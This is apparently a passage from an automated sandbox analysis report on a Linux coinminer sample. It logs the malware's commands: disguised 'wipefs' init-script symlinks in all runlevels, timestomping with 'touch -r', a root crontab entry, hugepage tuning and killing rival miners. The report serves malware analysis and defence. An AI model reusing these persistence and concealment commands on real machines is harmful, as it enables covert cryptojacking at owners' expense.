Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5546 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5556 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5556 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc1.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5565 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5565 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc2.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5573 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5573 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc3.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5581 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5581 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc4.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5590 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5590 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc5.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5599 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5599 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc.d/rc6.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5609 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: touch PID: 5609 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/touch
Arguments:	touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs /etc/rc.d/rc1.d/S01wipefs /etc/rc.d/rc2.d/S01wipefs /etc/rc.d/rc3.d/S01wipefs /etc/rc.d/rc4.d/S01wipefs /etc/rc.d/rc5.d/S01wipefs /etc/rc.d/rc6.d/S01wipefs
File size:	62488 bytes
MD5 hash:	985a951b1a7a8dbe51973e651a365900

Chronological Activities

Analysis Process: coinminer PID: 5618 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5618 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "cat /etc/crontab"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: cat PID: 5618 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cat
Arguments:	cat /etc/crontab
File size:	54080 bytes
MD5 hash:	1484a27859e2ca20ad667cc06d595d22

Chronological Activities

Analysis Process: coinminer PID: 5632 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5632 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "echo '0 /6 * * root /bin/wipefs' >> /etc/crontab"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: coinminer PID: 5640 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5640 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5651 Parent PID: 5640

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sysctl PID: 5651 Parent PID: 5640

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/sbin/sysctl
Arguments:	sysctl -w vm.nr_hugepages=128
File size:	24128 bytes
MD5 hash:	9df6c33985f7fcbf67238428900a5a8d

Chronological Activities

Analysis Process: coinminer PID: 5667 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5667 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "sysctl -p >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5676 Parent PID: 5667

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sysctl PID: 5676 Parent PID: 5667

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/sbin/sysctl
Arguments:	sysctl -p
File size:	24128 bytes
MD5 hash:	9df6c33985f7fcbf67238428900a5a8d

Chronological Activities

Analysis Process: coinminer PID: 5694 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5694 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "(touch /tmp/tmplog; chmod 666 /tmp/tmplog) >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5702 Parent PID: 5694

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5711 Parent PID: 5702

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: touch PID: 5711 Parent PID: 5702

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/touch
Arguments:	touch /tmp/tmplog
File size:	62488 bytes
MD5 hash:	985a951b1a7a8dbe51973e651a365900

Chronological Activities

Analysis Process: sh PID: 5724 Parent PID: 5702

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: chmod PID: 5724 Parent PID: 5702

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chmod
Arguments:	chmod 666 /tmp/tmplog
File size:	58584 bytes
MD5 hash:	7c556d30bb69995e4844f5e319e8c303

Chronological Activities

Analysis Process: coinminer PID: 5731 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: coinminer PID: 6121 Parent PID: 5731

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 6121 Parent PID: 5731

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 6122 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ps PID: 6122 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/ps
Arguments:	ps -ef
File size:	100120 bytes
MD5 hash:	8f71c85b9cc1809af7e7612c6144c527

Chronological Activities

Analysis Process: sh PID: 6123 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: grep PID: 6123 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep stratum+tcp
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: sh PID: 6124 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: awk PID: 6124 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/awk
Arguments:	awk "{print $2}"
File size:	4 bytes
MD5 hash:	36e491b1e47944fb397b84f790ef5093

Chronological Activities

Analysis Process: sh PID: 6125 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: xargs PID: 6125 Parent PID: 6121

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/xargs
Arguments:	xargs kill -9
File size:	62288 bytes
MD5 hash:	2098c131c6f1f63777e9678b4be4e752

Chronological Activities

Analysis Process: xargs PID: 6129 Parent PID: 6125

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/xargs
Arguments:	n/a
File size:	62288 bytes
MD5 hash:	2098c131c6f1f63777e9678b4be4e752

Chronological Activities

Analysis Process: kill PID: 6129 Parent PID: 6125

General

Start time:	15:21:07
Start date:	31/05/2018
Path:	/bin/kill
Arguments:	kill -9 6121 6123
File size:	29448 bytes
MD5 hash:	39b42e1d9f0e1f508f3d256386551133

Chronological Activities

Analysis Process: coinminer PID: 6218 Parent PID: 5731

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 6218 Parent PID: 5731

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "ps -ef \| grep stratum+tcp \| awk '{print $2}' \| xargs kill -9 >/dev/null 2>&1"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 6219 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ps PID: 6219 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/ps
Arguments:	ps -ef
File size:	100120 bytes
MD5 hash:	8f71c85b9cc1809af7e7612c6144c527

Chronological Activities

Analysis Process: sh PID: 6220 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: grep PID: 6220 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep stratum+tcp
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: sh PID: 6221 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: awk PID: 6221 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/awk
Arguments:	awk "{print $2}"
File size:	4 bytes
MD5 hash:	36e491b1e47944fb397b84f790ef5093

Chronological Activities

Analysis Process: sh PID: 6222 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: xargs PID: 6222 Parent PID: 6218

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/xargs
Arguments:	xargs kill -9
File size:	62288 bytes
MD5 hash:	2098c131c6f1f63777e9678b4be4e752

Chronological Activities

Analysis Process: xargs PID: 6224 Parent PID: 6222

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/xargs
Arguments:	n/a
File size:	62288 bytes
MD5 hash:	2098c131c6f1f63777e9678b4be4e752

Chronological Activities

Analysis Process: kill PID: 6224 Parent PID: 6222

General

Start time:	15:22:08
Start date:	31/05/2018
Path:	/bin/kill
Arguments:	kill -9 6218 6220
File size:	29448 bytes
MD5 hash:	39b42e1d9f0e1f508f3d256386551133

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Classification

Signature Overview

AV Detection:

Bitcoin Miner:

Networking:

Persistence and Installation Behavior:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Runtime Messages

Behavior Graph

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Public

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: coinminer PID: 5451 Parent PID: 5410

General

Analysis Process: coinminer PID: 5454 Parent PID: 5451

General

Analysis Process: coinminer PID: 5461 Parent PID: 5454

General

Analysis Process: sh PID: 5461 Parent PID: 5454

General

Analysis Process: sh PID: 5465 Parent PID: 5461

General

Analysis Process: tmpnam_KEKnmE PID: 5465 Parent PID: 5461

General

Analysis Process: tmpnam_KEKnmE PID: 5472 Parent PID: 5465

General

Analysis Process: tmpnam_KEKnmE PID: 5479 Parent PID: 5472

General

Analysis Process: tmpnam_KEKnmE PID: 5488 Parent PID: 5479

General

Analysis Process: tmpnam_KEKnmE PID: 5497 Parent PID: 5488

General

Analysis Process: tmpnam_KEKnmE PID: 5506 Parent PID: 5497

General

Analysis Process: which PID: 5506 Parent PID: 5497

General

Analysis Process: tmpnam_KEKnmE PID: 5515 Parent PID: 5488

General

Analysis Process: which PID: 5515 Parent PID: 5488

General